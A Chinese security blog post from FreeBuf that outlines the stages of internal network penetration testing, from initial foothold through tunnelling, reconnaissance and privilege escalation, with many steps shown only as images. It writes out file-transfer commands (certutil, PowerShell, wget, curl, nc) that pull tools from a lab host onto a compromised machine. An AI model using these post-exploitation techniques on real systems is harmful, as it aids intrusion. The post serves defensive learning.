freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透全流程技术点——CheckList
2024-11-18 16:08:52

一、概述

在企业日常安全运营中,面对日益复杂多变的威胁攻击环境,如何有效的防范有目的性的攻击者或APT(高级持续性威胁),需要了解常见战术攻击手法。

未知攻,焉知防。结合近期在学习内网渗透的内容,本篇文章主要是简要梳理内网渗透的各个阶段的要做的事情。了解内网渗透各个阶段技战术,才能更好的服务于企业日常安全运营工作。

二、MITRE ATT&CK

MITRE ATT&CK ®是一个全球可访问的知识库,其中包含基于现实世界观察的对手战术和技术。ATT&CK 知识库被用作私营部门、政府以及网络安全产品和服务社区开发特定威胁模型和方法的基础。网站链接: https://attack.mitre.org/

1731928496_673b21b0613a817055377.png!small?1731928498180

基于APT组织追踪报告。归纳总结了所有目前已知攻击者的TTPs,TTPs是 Tactics, Techniques, and Procedures的缩写,分别战术、技巧和程序。用以描述威胁攻击者的攻击模式和特征。

  • 战术(Tactics):指的是宏观层面描述网络攻击
  • 技巧(Techniques):比战术的细节更多,提供完整的脉络
  • 程序(Procedures):说明完整的攻击过程,较技巧提供的信息更详细。

一份有价值的威胁情报会提供详尽的TTPs分析,协助读者深入了解该次攻击事件,从而采取正确的防御措施。

例子;

战术:攻击者想要维权

技术:维持权限的技术 主要有 添加账号,计划任务,开机启动,WMI

执行步骤: 计划任务

三、Lockheed Martin kill chain

洛克希德马丁击杀链,用来描述针对的分阶段攻击,每一环是队攻击做出侦测和反应的机会,攻击者依据该击杀链设计和建立攻击链路。

1731928624_673b2230e487ca3b8ef16.png!small?1731928625727

四、内网渗透流程

1731928754_673b22b2d12c904380174.png!small?1731928757016

五、内网渗透主要技战术

1731928867_673b2323c55d689b75397.jpg!small?1731928868057

六、外网打点

外网打点需要我们通过下面各类手段,快速的拿下一台机器的权限,并以此为跳板进入内网,该步骤是内网渗透的起点。一个好的跳板机器,比如在运维网的机器,可以省去我们在内网横向的时间,快速定位到核心的机器集群。但是一般我们外网打点的机器可能是很边缘机器,这就需要我们不断的做信息收集,网络位置的判断,横移到关键核心的网络区域。

常见的打点手法

1731916546_673af302911fc34e0c7c2.png!small?1731916547245

进入内网后,需要判断目前机器所处的网络位置:

网络位置判断

  • 网络区域判断
    • DMZ
    • 生产网
    • 办公网
  • 主机角色
    • 运维
    • 行政
  • 连通性判断
    • icmp

七、代理搭建

拿下一台主机的权限之后,为了方便对内网进行横向渗透,就需要以这台我们拿下的主机作为跳板,建立起隧道。

常见的的隧道代理有

1731916568_673af3187be083c0964e9.png!small?1731916570727

注意:

ping 不出网,但是可能其他服务出网,如:tcp / http /https /dns /udp 等

八、信息收集

进入内网后,要在你的落脚点主机,进行内网的信息收集,包括:主机环境的判断,是工作组环境还是域环境;在域环境中,是否是域管理员;命令行查看历史命令;敏感文件收集;主机发现。

1731916594_673af332ad1df8346d97f.png!small?1731916595366

九、Command

获取内网主机权限是,关于如何扩大战果,需在命令行界面上进行一系列的信息收集。

1731916615_673af347c6f4cd2109c88.png!small?1731916616426

十、敏感文件

收集内网主机上敏感文件

1731916623_673af34f7323e61ac2b35.png!small?1731916625566

十一、主机发现

内网的主机发现工作

1731916631_673af357c7bb8fe61d716.png!small?1731916632660

十二、文件下载

搭建文件下载服务器

1731916639_673af35f965814f27cc62.png!small?1731916641487

Windows文件下载

powershell

Invoke-WebRequest -Uri "http://192.168.2.167:8080/http.pl" -OutFile "C:\Users\mathilda\Downloads\http.pl"

certutil

certutil.exe -urlcache -split -f "http://192.168.2.167:8080/1.txt" bad.txt

1731916716_673af3ac83e661434aee1.png!small?1731916717772

VBS

bitsadmin(win03没有,win08及以上有)

regsvr32

FTP

TFTP

Linux文件下载

wget

wget http://192.168.2.167:8080/1.txt

curl

curl -o /home/kali/Downloads/http1.pl http://192.168.2.167:8080/http.pl

1731916754_673af3d2adb12d739562c.png!small?1731916756344

nc

A机器往B(192.168.2.135)机器传输文件
首先在B机器上开启端口监听,并把文件保存在 123.zip 文件
nc -l 9996 >  123.tar.gz
然后在A机器上 使用 nc 往 B机器 传输数据
nc 192.168.2.135 9996 < iodine-0.8.0.tar.gz

scp

从远程机器上复制文件到本地
scp docker@192.168.2.135:/home/docker/1.txt ./

1731916788_673af3f4734b3563dee5d.png!small?1731916789771

十三、权限提升

Windows提权

1731916799_673af3ffb1e7f047dcaf2.png!small?1731916801440

Windows 单机权限提升-checklist

项目

小项

备注

1、内核提权

Google

Google当前内核版本是否有那些漏洞

searchsploit


GitHub


Vulnerable Drivers


2、枚举

环境变量


# 内网渗透 # 内网渗透基础
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录